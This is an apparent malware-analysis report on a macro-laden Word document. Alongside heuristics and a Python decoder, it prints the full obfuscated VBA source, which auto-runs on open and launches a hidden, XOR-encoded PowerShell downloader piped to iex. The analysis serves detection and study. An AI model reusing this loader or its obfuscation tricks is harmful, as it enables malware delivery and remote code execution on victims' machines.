Verdict: MALICIOUS (Risk Score 222)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with a `Document_open` handler, so it runs as soon as the document is opened with macros enabled; no software vulnerability is exploited, execution depends on the user allowing macros. The handler calls `lEDuh()`, which invokes `VBA.Shell()` on a command assembled at run time: `Chr(tQmpS + vbKeyP + SVFRiaij)` evaluates to "P" (the two surrounding variables are never assigned in the extracted source and so are Empty, leaving `vbKeyP` = 80), followed by "owers" and the return values of `TPOwucort`, `AKzQqV`, `kCnVZ` and `ULzbvSo`, which together spell a `PowersHeLL -join ( ... )` one-liner. The window-style argument `94758 - 94758` is 0 (`vbHide`), so the PowerShell window is hidden. The PowerShell stage splits a long digit string on the delimiter alphabet `JES~ludPAf`, XORs each value with 0x30, casts it to `[char]`, joins the result and pipes it to `& ($PsHOME[4]+$PsHOME[30]+'x')`, which resolves to `iex` (Invoke-Expression) on a default PowerShell installation path. Decoding the digits carried by `TPOwucort` alone already yields `new-object System.Net.WebClient`, consistent with a downloader that fetches and runs a second-stage payload. The remaining statements (`Tan(...)`, `CDbl(...)`, `Rnd(...)`, `Log(...)` over unassigned variables under `On Error Resume Next`) are dead padding inserted to defeat signature matching. The ClamAV detection and the obfuscated VBA together indicate malicious intent.
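The decoding the PowerShell stage performs can be reproduced offline. The Python below is an added analyst helper, not code from the sample or from the analyzer. It recovers the delimiter alphabet and the XOR key from the one-liner itself (so it also handles variants that change either), decodes the digit blob, and evaluates the `$PsHOME` indexing against an assumed default PowerShell install path. The input is constructed from the preview: the literal returned by `TPOwucort` joined directly to the decoder tail returned by `ULzbvSo`, with the digits from the intervening functions omitted, so the decoded text is a truncated prefix of the real second stage.

```python
import re

# $PsHOME of a default 64-bit Windows PowerShell install. This is an assumption
# about the victim environment, not something the report states; the sample
# indexes into it to spell a command name without writing the token.
DEFAULT_PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Constructed test input: the string literal TPOwucort() returns in the preview
# (fragments concatenated, "Powers" prefix from lEDuh() restored), joined
# straight to the decoder tail ULzbvSo() returns. The digits contributed by
# AKzQqV(), kCnVZ() and ULzbvSo() are left out, so this is a truncated but
# structurally faithful copy of the command the macro hands to Shell().
SAMPLE_COMMAND = (
    "PowersHeLL -joIN ( '"
    "20P82u115d122~105P99d115~16S13u16E94P85A71d29S95J82l90f85A83d68J16E66d81~94"
    "~84J95f93S11P20P117P95A66u127P101~86u16u13l16u94d85P71E29l95E82E90J85E83l68u16A99"
    "~73f67~68u85P93A30S126l85~68J30S103d85l82A115f92u89A85E94"
    "'.SpLIt('JES~ludPAf' ) |ForEaCh {[cHar]( $_-bXOr'0x30' )} ) "
    "|& ( $PsHoME[4]+$PsHOMe[30]+'x')"
)


def extract_parameters(command):
    """Pull the encoded blob, the delimiter alphabet and the XOR key out of a
    'blob'.Split('delims') | ForEach {[char]($_ -bxor key)} one-liner.
    Matching is case-insensitive because the sample randomises token case."""
    m = re.search(r"'([^']*)'\s*\.split\(\s*'([^']*)'\s*\)", command, re.IGNORECASE)
    if not m:
        raise ValueError("no 'blob'.Split('delims') construct found")
    k = re.search(r"-bxor\s*'?(0x[0-9a-f]+|\d+)'?", command, re.IGNORECASE)
    if not k:
        raise ValueError("no -bxor key found")
    return m.group(1), m.group(2), int(k.group(1), 0)  # base 0 accepts 0x30 or 48


def decode_blob(blob, delimiters, key):
    """Mirror the PowerShell stage: split on any delimiter character, treat each
    token as a decimal byte, XOR it with the key and cast to a character.
    Empty tokens (doubled, leading or trailing delimiters) are skipped; PowerShell
    would fail on the [char] cast there, so a working sample never has them."""
    pattern = "[" + re.escape(delimiters) + "]"
    return "".join(chr(int(tok) ^ key) for tok in re.split(pattern, blob) if tok)


def resolve_call_target(command, pshome=DEFAULT_PSHOME):
    """Rebuild the command name handed to the call operator, e.g.
    & ( $PsHOME[4]+$PsHOME[30]+'x' ), by indexing into the given $PsHOME."""
    m = re.search(r"\|\s*&\s*\(\s*([^)]*)\)", command)
    if not m:
        return None
    out = []
    for piece in m.group(1).split("+"):
        piece = piece.strip()
        idx = re.fullmatch(r"\$pshome\[(\d+)\]", piece, re.IGNORECASE)
        if idx:
            out.append(pshome[int(idx.group(1))])
        elif len(piece) >= 2 and piece[0] == piece[-1] == "'":
            out.append(piece[1:-1])
        else:
            raise ValueError("unsupported expression piece: " + piece)
    return "".join(out)


def decode_command(command, pshome=DEFAULT_PSHOME):
    """Return (decoded second stage, command name the stage is piped into)."""
    blob, delimiters, key = extract_parameters(command)
    return decode_blob(blob, delimiters, key), resolve_call_target(command, pshome)


if __name__ == "__main__":
    stage, target = decode_command(SAMPLE_COMMAND)
    print("piped into:", target)
    print("decoded   :", stage)
```

Feeding the full concatenation (`TPOwucort` + `AKzQqV` + `kCnVZ` + the leading digits of `ULzbvSo`) into `decode_command` recovers the complete second stage; any hostnames it yields are indicators and should be handled through your own IOC process rather than copied into a report unverified. The 32-bit `$PsHOME` (`C:\Windows\SysWOW64\WindowsPowerShell\v1.0`) has the same characters at offsets 4 and 30, so the `iex` trick works in either host.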
Heuristics (6)
- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874677-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): matched lines in script:
    iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51))))
    lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758)
    JQbTQ = Tan(69001)
- Document_Open macro (high, OLE_VBA_DOCOPEN): matched lines in script:
    End Function
    Private Sub Document_open()
    On Error Resume Next
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that appears in any Office document containing drawing markup; it is not a network indicator for this sample.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11269 bytes | 2b9454bd35ea4b7fe0ac70476726f216e2e9dbb3680d0c8e94b1275134d10174 |

Preview: first 1,000 lines of the extracted script (macros.bas). Two modules are concatenated; the second begins at the `Attribute VB_Name = "ANhITwOwsmRo"` line.
Attribute VB_Name = "zmzacfKXZmGN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lEDuh()
On Error Resume Next
sqWNMw = Tan(54876)
Growrd = Tan(56470)
oKcnk = ZLObpX
JsBujD = CDbl(viJjv)
TPqbT = jicIX
fajFPh = CDbl(sVAdi * CDbl(IhFXnq + Int(DCoaMN * Rnd(75370)) * oKEwZL * Log(24614 * mHwPL - TKwEpb + Fix(51))))
qiTPz = Tan(65238)
IPioUE = Tan(39551)
jicOvU = dHOTvG
zZDRjN = CDbl(rYYMD)
ZzOCRb = PuXdU
anbwXY = CDbl(uHhkd * CDbl(tUsjib + Int(LmqBu * Rnd(12477)) * tbQIMR * Log(59924 * vsRcJ - pWvdRl + Fix(51))))
kLhTr = Tan(23554)
kPVTX = Tan(6992)
cwSOL = NWfXFE
EIiSvP = CDbl(zmjjA)
VaLvW = SjvfQM
FjPTmD = CDbl(wXCCZw * CDbl(cHJEh + Int(tAbhA * Rnd(82936)) * NAkWSZ * Log(73770 * BvOho - MEvQoO + Fix(51))))
jdkODu = Tan(41510)
TsfBun = Tan(85788)
ztMvmY = OSPhn
rKdEb = CDbl(LmqiM)
hvfTfj = YvYjP
iKDaw = CDbl(lIIcSG * CDbl(jmNXc + Int(fMYjwz * Rnd(69773)) * zRdPj * Log(48073 * AThoH - kooRu + Fix(51))))
lEDuh = dUqNTiEAQVp + VBA.Shell(mpQcvIAikl + Chr(tQmpS + vbKeyP + SVFRiaij) + "owers" + TPOwucort + AKzQqV + kCnVZ + ULzbvSo, 94758 - 94758)
JQbTQ = Tan(69001)
cvAUfY = Tan(28372)
qQfppc = vEwwJ
UrIWi = CDbl(oszQu)
CIPDV = fVYUN
MIYNM = CDbl(KSTNT * CDbl(NARvjS + Int(vjrQPq * Rnd(57399)) * WZUwZ * Log(49674 * sBsOH - ZKXDLO + Fix(51))))
bBaaZ = Tan(98775)
vsjXzX = Tan(76774)
BLpXK = rZbkSX
XNjac = CDbl(ipIqD)
ThFlS = ABjYTN
RNZTfw = CDbl(Usswzi * CDbl(vjsNS + Int(wsqMk * Rnd(11064)) * imDkG * Log(93591 * lObGuc - zIStXj + Fix(51))))
End Function
Private Sub Document_open()
On Error Resume Next
piuUN = Tan(12943)
MrbwP = Tan(37903)
mMqOX = ziPTJ
LEXvkG = CDbl(CzZld)
DHSjzl = dQjzWM
UcKOm = CDbl(EJXmpz * CDbl(VAmmoV + Int(jiQGqq * Rnd(26887)) * qVmQOQ * Log(86750 * fTHVIz - AXrUB + Fix(51))))
ddLRww = Tan(6420)
ZqaMq = Tan(38318)
bwLlCf = AwGqZR
zwYCY = CDbl(ubhjkf)
lQPTWp = Sicaw
Yuzdh = CDbl(vVYZX * CDbl(oYoHmh + Int(SjWVN * Rnd(68164)) * iPktf * Log(74819 * YERRV - qpFYl + Fix(51))))
lEDuh
zKPECu = Tan(48319)
srbff = Tan(61559)
mNACs = bnIJVs
UiFLpL = CDbl(NKrCsw)
QiWfQv = rcLMSa
cIbGqA = CDbl(qRWzD * CDbl(mjLddp + Int(XwDPR * Rnd(57947)) * pfZTE * Log(10869 * WBozMt - fVrCw + Fix(51))))
wDunY = Tan(36475)
mPitOf = Tan(49838)
rwcIA = IVdoJ
VdDXKc = CDbl(rbGCXv)
PjaHC = fOijjP
FcJEz = CDbl(kCdCt * CDbl(WlYPGz + Int(UfbYl * Rnd(88508)) * QsbWz * Log(43858 * SVpoz - YoQtpC + Fix(51))))
End Sub
Attribute VB_Name = "ANhITwOwsmRo"
Function TPOwucort()
On Error Resume Next
KsPmQ = cXHrF
FAqQIZ = Tan(56605)
MkWvK = Tan(84194)
lFTtY = GTKsn
uVlbvj = CDbl(lJoVD * CDbl(vaATTb + Int(WQZHYm * Rnd(68233)) * PMdkUh * Log(14921 * bJbMsG - zkQud + Fix(51))))
dCIzSV = CDbl(KkiRnp)
hCUVGnJ = "HeL" + "L -joIN ( " + "'20P82u115d122" + "~105P99d115~" + "16S13u16E94P85"
OiwjKG = lsYksH
hPjLU = Tan(63511)
JMnUL = Tan(15043)
ozGSMZ = Smzidq
jpzAVJ = CDbl(TGvRuF * CDbl(kXQWJ + Int(BcDZD * Rnd(24479)) * jpYZNP * Log(31713 * WpTqwC - qLBSU + Fix(51))))
EmXzJd = CDbl(iiVDip)
GvkcXAYjoAY = "A71d29S95J" + "82l90f85A83d" + "68J16E66d81~94" + "~84J95f93S11P20" + "P117P95A66u127P" + "101~86u16u1" + "3l16u9" + "4d85P71E2"
LrXZn = FnzQj
mOios = Tan(20365)
ZoOti = Tan(40578)
kRWhV = qIpwn
pTjmiJ = CDbl(PTtzMQ * CDbl(qEtHJ + Int(UKdRaz * Rnd(79085)) * pdCawN * Log(35724 * tCkkIF - qRJQA + Fix(51))))
pPMiUc = CDbl(qqZPCC)
mzwBLSnAiYG = "9l95E" + "82E90J85E" + "83l68u16A99" + "~73f6"
jMPKsA = UHGZZ
dFjOiw = Tan(86991)
iCOUmE = Tan(6194)
tdpFPf = OzsuNz
bXLOE = CDbl(ZBQvvf * CDbl(XbVmKz + Int(OhBRJ * Rnd(14558)) * qnGWVr * Log(39441 * rJXAHO - NuKkiH + Fix(51))))
tFzMi = CDbl(KZZod)
oEiztQ = "7~68u85P93A30S" + "126l85" + "~68J3" + "0S103d85l82A11" + "5f92u89A85" + "E94"
TPOwucort = hCUVGnJ + GvkcXAYjoAY + mzwBLSnAiYG + oEiztQ
End Function
Function AKzQqV()
On Error Resume Next
DTfKz = iFGDF
zatiS = Tan(31199)
DKAmGI = Tan(47031)
WPSCuf = CUlvEL
RqYWh = CDbl(YOnfX * CDbl(fDJmSf + Int(NNwzH * Rnd(94927)) * rRmVd * Log(39398 * zsKNk - wKIcmf + Fix(51))))
zpUsR = CDbl(MhGbS)
ahaiIpIXHLG = "l68A11P20S104" + "S65l120d1" + "24S90" + "P16~13A16E23P8" + "8E68l68l64S10" + "~31S3"
uKqGn = oPDcvm
YaXkIZ = Tan(44608)
LcmVR = Tan(47238)
DNUSK = RwLOQ
jJkbq = CDbl(QuJjL * CDbl(ujAhol + Int(QhXPoj * Rnd(2231)) * mhbWr * Log(78992 * ZKaAw - BiuTC + Fix(51))))
VJuvs = CDbl(wdMhMU)
FRPrkVZ = "1l67l95u92~8" + "1S66" + "S94u85l2" + "9P67d" + "70P89l85S6" + "8~89d84A92u81"
vNXiv = COMDL
YuAKC = Tan(97723)
cvPzT = Tan(94939)
oiQPf = HDYRN
iUdPj = CDbl(VjikRj * CDbl(IjMDNP + Int(PAQPu * Rnd(51108)) * fikrlP * Log(79569 * ozfiT - NlDMjQ + Fix(51))))
hENVGB = CDbl(BztjQJ)
lnzkUzPjqf = "l30P83E95d93" + "P31~8" + "3u" + "68J83~92S2J65" + "f99J31P112P"
nRuMEG = MTRBd
aAjUZw = Tan(50562)
EHnkj = Tan(68348)
wWjlK = SILnKj
HTchc = CDbl(GioTrK * CDbl(wziNN + Int(wALhM * Rnd(54638)) * BdIqa * Log(4409 * sCliG - AciJD + Fix(51))))
jSwmQE = CDbl(idaws)
ZfPVbl = "88S68J68~6" + "4P10E3" + "1f31J67J71" + "~89l94u87" + "S90J81l64A81" + "P94S30l83" + "A95A93S31" + "l91E4d"
EpcoWY = cGLRc
KqTzp = Tan(25393)
BNVIj = Tan(84377)
EnZFz = CrWzH
KCnil = CDbl(UrTlP * CDbl(uIvCB + Int(UqGrk * Rnd(99685)) * oMpEOq * Log(39876 * qSSOi - AOAjTX + Fix(51))))
QETRnq = CDbl(vfnFvv)
zdLZFjjSU = "83d93S64P" + "95d31u" + "112S88E68" + "E68E64u1"
DcnbiY = dwYzPS
fafuF = Tan(46102)
dWWFY = Tan(55502)
smzBao = EjNbXc
GAqKSo = CDbl(ozHzL * CDbl(TZIhj + Int(EwRqb * Rnd(25848)) * mQttju * Log(99013 * XVfuFo - EorCPS + Fix(51))))
oKPzkC = CDbl(vEXFLj)
zVpXDKwZaf = "0P" + "31S31f84l8" + "5f91E95u66l9" + "3J83J30d" + "64u92~31"
IUMBIS = tntGoG
ftlhTB = Tan(19036)
SNppbD = Tan(66827)
QwUmn = kTzDi
bzrTb = CDbl(pLLqzV * CDbl(IdqiPk + Int(NsMqGr * Rnd(70882)) * sibuhv * Log(18056 * VVObO - zZzzD + Fix(51))))
lBNjPE = CDbl(hPFnn)
qLVAzb = "E9" + "0f67E" + "31P70l117P" + "102f2S71P31J" + "112S88P68d68J6" + "4l10~31J31" + "A71f" + "71S71d30E87d6" + "4d92"
AKzQqV = ahaiIpIXHLG + FRPrkVZ + lnzkUzPjqf + ZfPVbl + zdLZFjjSU + zVpXDKwZaf + qLVAzb
End Function
Function kCnVZ()
On Error Resume Next
ViPuS = PMkoo
LlipM = Tan(6711)
wtuaf = Tan(72229)
jUIiMK = SKrLP
WZYfKj = CDbl(qwHGv * CDbl(wTnVf + Int(CYZzE * Rnd(45031)) * IlacBu * Log(48837 * iZUOPw - klMCj + Fix(51))))
GwZUH = CDbl(biPVG)
XKRGVcKZwYb = "u8" + "1S71l73A85~66d6" + "7A30A85l" + "69P31f97~86u8" + "9d2u116" + "f119P" + "31J" + "112S88J68J" + "68l64l10d3"
HuwiZ = cZUYLA
hmfqz = Tan(3098)
Bnswzw = Tan(76536)
rMUlzA = BUiUQ
qNVwq = CDbl(izrbR * CDbl(mSUVi + Int(ThRUIN * Rnd(57113)) * SzNrBU * Log(47136 * LZXAJk - rAkCd + Fix(51))))
pWEHSw = CDbl(jkzZzj)
TmoRPU = "1P31E71E71" + "J7" + "1f30d67A8" + "1l8" + "9S87f81E66f30J8"
pLowD = JvfKm
wjzEB = Tan(74918)
kMhBCS = Tan(80331)
pVPhNr = HAKEt
ashMa = CDbl(GPBjw * CDbl(OIXCw + Int(iuOSZ * Rnd(66910)) * MqHSTN * Log(12594 * aKTAp - zjbnoT + Fix(51))))
zsITw = CDbl(Nczzi)
mdDvhUwH = "3l95~93l31P1" + "00~126S118" + "S81A69" + "d72~31A23~30d99" + "f64~9"
TwGww = YqJWlf
QRqOB = Tan(89181)
kPjNHJ = Tan(26186)
ajHhB = BZOWki
UiEKk = CDbl(CsruoG * CDbl(jjjzUp + Int(QsIEGw * Rnd(7730)) * khIaH * Log(49233 * lcDWO - ZjmSb + Fix(51))))
pcVAEo = CDbl(BHJlOw)
CUYPmNBw = "2A89E68P24l" + "23P112S2" + "3P25S11d20J" + "91l83S120l83d" + "103u16" + "S13E1"
ciWJNB = qaVwh
ZTVsD = Tan(66778)
njuSH = Tan(61544)
knPcz = YKRZAE
TzTjSD = CDbl(XwSwO * CDbl(PCRNq + Int(imTfii * Rnd(95052)) * CNYjV * Log(62983 * FpPKA - MplVR + Fix(51))))
WqASk = CDbl(UnQJa)
rHsUj = "6l20" + "d82E115l122d1" + "05A99" + "J115J30S94d85P7"
wlqAdD = JlYZN
LSiZL = Tan(84517)
RRXwj = Tan(40774)
BzKMF = fFfQv
LmoiDJ = CDbl(qAsvA * CDbl(SITnzq + Int(oFhdXK * Rnd(8797)) * WzLKZQ * Log(42601 * cmTnY - UIDJSn + Fix(51))))
FLHtE = CDbl(TChka)
OjFofcRh = "2E68u24P1A28" + "A16~1J9A5u4" + "S2f0l25" + "d11S20J115f9" + "6P123u81E" + "89~92P16" + "E13S16S20~" + "85E94J70E10S6"
wSIfj = Nkhtjd
CuXTW = Tan(71764)
RaLfcl = Tan(27597)
QRRfa = EKRbSj
riVREV = CDbl(iUjltB * CDbl(sIXEzM + Int(jTZVC * Rnd(40852)) * wTwGi * Log(4428 * wqOYPP - vlflZv + Fix(51))))
KwvBA = CDbl(jAjfOz)
QIvAG = "8d85S93P64P1" + "6P27~16A23A108" + "~23S1" + "6~27S16" + "P20J91u8" + "3f120u83u103l16" + "E27"
zTiPb = ipXoIC
zpbST = Tan(81380)
vwZYnI = Tan(32664)
ltTWP = GuBzX
iPkls = CDbl(ZXacCL * CDbl(awnbL + Int(GizLYp * Rnd(16527)) * aHqjt * Log(23850 * rjMnj - jtpIr + Fix(51))))
RrkDL = CDbl(jPzQkw)
fBTRQwml = "J16~23E3" + "0l85f72~85S23f1" + "1J86~95~66J85A" + "81P83A" + "88J24P20f67A71" + "S96" + "u119P92l82" + "E16d89d94f1" + "6A20S104J65E12" + "0E1"
wNMdWb = CwwLE
WCjCrG = Tan(22408)
iJiwoW = Tan(81337)
vMHcAr = njdEMi
fHLrf = CDbl(StDcB * CDbl(NalAbN + Int(WEHbn * Rnd(51801)) * hCnLDq * Log(97556 * dXnzri - BIibW + Fix(51))))
XfYQj = CDbl(PGsZLf)
kNiqws = "24~90E25d75P" + "68A66A7" + "3P7" + "5A20" + "J117u95E6" + "6f12" + "7f101f8" + "6P30J116A95u71" + "J94S92d95P" + "81P84u118A89S9"
WwVXO = KOtaVw
orhsow = Tan(45816)
KADIM = Tan(68043)
WFrPhI = EuQFQq
ZoXYVf = CDbl(BZjML * CDbl(UPDjM + Int(sRqWww * Rnd(26668)) * wIhrvN * Log(56445 * LjkrEi - jIDVs + Fix(51))))
RabHDK = CDbl(rrQzmj)
nUjZqBJrwHm = "2d85f24~20E67J" + "71l96E119u" + "92A82d30u100u" + "95~99A68A" + "66~89E94" + "P87" + "f24E25P28d16" + "u20S115S9" + "6S1" + "23P81u89d92A25u"
kCnVZ = XKRGVcKZwYb + TmoRPU + mdDvhUwH + CUYPmNBw + rHsUj + OjFofcRh + QIvAG + fBTRQwml + kNiqws + nUjZqBJrwHm
End Function
Function ULzbvSo()
On Error Resume Next
HajaQ = CCEUr
tSwzXc = Tan(80532)
QAzHP = Tan(10635)
tGIjA = bpQmX
wkUjW = CDbl(jaYDj * CDbl(lHAcr + Int(JihhKQ * Rnd(80444)) * WvVVzH * Log(5384 * AZvQc - fidqZH + Fix(51))))
OaDtk = CDbl(oFDGZw)
fOUmlSz = "11f99" + "l6" + "8P81u66f68S2" + "9f96~66d95u8" + "3P85E67P67~16" + "d20~11" + "5P96J" + "123l81E89" + "f92J11" + "E82S66l85A81A"
Vmmbc = fPaMFt
Mviirt = Tan(5883)
nccWXZ = Tan(58316)
slzsX = wrZZjA
dmsSX = CDbl(JnVJF * CDbl(LwRMi + Int(julcVa * Rnd(77919)) * YWLcf * Log(69838 * YKqjEA - UZXct + Fix(51))))
XARRd = CDbl(jncsi)
VmLUtaP = "91E" + "11" + "S77S83~81" + "~68E83A88l" + "75u71~66A89d"
LmHRj = ucvPB
amAXF = Tan(69326)
Ircrjl = Tan(72255)
lBJYSa = hhwizY
ZIDCN = CDbl(niLvY * CDbl(UdHvwH + Int(ojlcCJ * Rnd(5478)) * htPavI * Log(97965 * UoiXX - HpNAiG + Fix(51))))
ofBsKN = CDbl(lwUcb)
oQsQBhOCaJ = "68d" + "85~29f88" + "l95J67u68f1" + "6P20" + "S111f30d117" + "E72l83A85u64P6" + "8J89P95A9" + "4f30l125A85f6" + "7f"
vBKfC = BjTWz
VwtnrL = Tan(54510)
wwHHPD = Tan(81557)
Ycomm = KnVst
Gkrni = CDbl(nkpwsQ * CDbl(QOQzih + Int(mDzjw * Rnd(39063)) * WKHGCV * Log(57647 * MFTcj - GjajX + Fix(51))))
DnHoKC = CDbl(Zhrpv)
wBLWOXZzzdD = "67l81" + "E87A85J11A77l" + "77'." + "SpLIt('" + "JES~ludPAf' )" + " |ForEaCh {[" + "cHar]( " + "$_-" + "bXOr'0x30'"
JTZBA = jquTX
kEYoIv = Tan(51748)
jKXRUP = Tan(83088)
sSZziR = wjCjtc
awiIo = CDbl(bFjQI * CDbl(dsuIN + Int(wBddcN * Rnd(1849)) * XDzRnF * Log(96507 * jaiLb - SmjIpQ + Fix(51))))
wUVHDn = CDbl(GRcCP)
GBrZDzChPV = " )} ) |& ( $Ps" + "HoME[4]+$PsHO" + "Me[30]+'x')"
ULzbvSo = fOUmlSz + VmLUtaP + oQsQBhOCaJ + wBLWOXZzzdD + GBrZDzChPV
End Function